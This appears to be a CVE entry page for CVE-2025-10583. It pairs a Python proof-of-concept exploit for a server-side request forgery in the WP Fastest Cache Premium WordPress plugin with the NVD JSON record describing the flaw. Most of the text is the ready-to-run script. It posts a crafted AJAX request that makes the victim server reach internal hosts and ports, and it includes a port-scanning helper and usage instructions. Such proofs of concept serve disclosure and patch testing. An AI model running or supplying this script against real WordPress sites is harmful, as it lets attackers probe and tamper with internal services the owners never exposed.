CVE-2025-10583

import requests import sys # CVE-2025-10583 PoC - WP Fastest Cache Premium SSRF Vulnerability # Target: WordPress site with WP Fastest Cache Premium <= 1.7.4 def exploit_ssrf(target_url, wp_path='/', target_internal_host='127.0.0.1', target_port=80): """ Exploit SSRF in WP Fastest Cache Premium's get_server_time_ajax_request AJAX action Args: target_url: Target WordPress site URL wp_path: WordPress installation path target_internal_host: Internal host to target (default: 127.0.0.1) target_port: Internal port to target (default: 80) """ # Construct the AJAX endpoint URL ajax_url = f"{target_url.rstrip('/')}{wp_path.lstrip('/')}wp-admin/admin-ajax.php" # Construct SSRF payload targeting internal service # Using http:// scheme to force HTTP request to internal host ssrf_url = f"http://{target_internal_host}:{target_port}" # Prepare POST data data = { 'action': 'get_server_time_ajax_request', 'url': ssrf_url # SSRF payload - attacker controlled URL } print(f"[*] Target: {target_url}") print(f"[*] AJAX Endpoint: {ajax_url}") print(f"[*] SSRF Target: {ssrf_url}") try: # Send request with subscriber-level authentication # Note: Requires valid subscriber session cookie response = requests.post(ajax_url, data=data, timeout=10, verify=False) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)} bytes") if response.status_code == 200: print("[+] Request successful - SSRF vulnerability confirmed") print(f"[>] Response snippet: {response.text[:200]}...") return True else: print("[-] Request failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def scan_internal_port(target_url, internal_host, port): """Scan internal port via SSRF""" return exploit_ssrf(target_url, '/', internal_host, port) if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [internal_host] [port]") print(f"Example: python {sys.argv[0]} https://example.com 127.0.0.1 8080") sys.exit(1) target = sys.argv[1] host = sys.argv[2] if len(sys.argv) > 2 else '127.0.0.1' port = int(sys.argv[3]) if len(sys.argv) > 3 else 80 exploit_ssrf(target, '/', host, port)

{"cve": {"id": "CVE-2025-10583", "sourceIdentifier": "[email protected]", "published": "2025-12-12T08:15:47.103", "lastModified": "2026-04-15T15:16:40.627", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Fastest Cache Premium plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.7.4 via the 'get_server_time_ajax_request' AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. The free version is not affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://research.cleantalk.org/2025-10583", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-10583/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b9e64c54-a78f-454a-a9ee-02f64b6ae83d?source=cve", "source": "[email protected]"}, {"url": "https://www.wpfastestcache.com/changelog/", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-10583/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}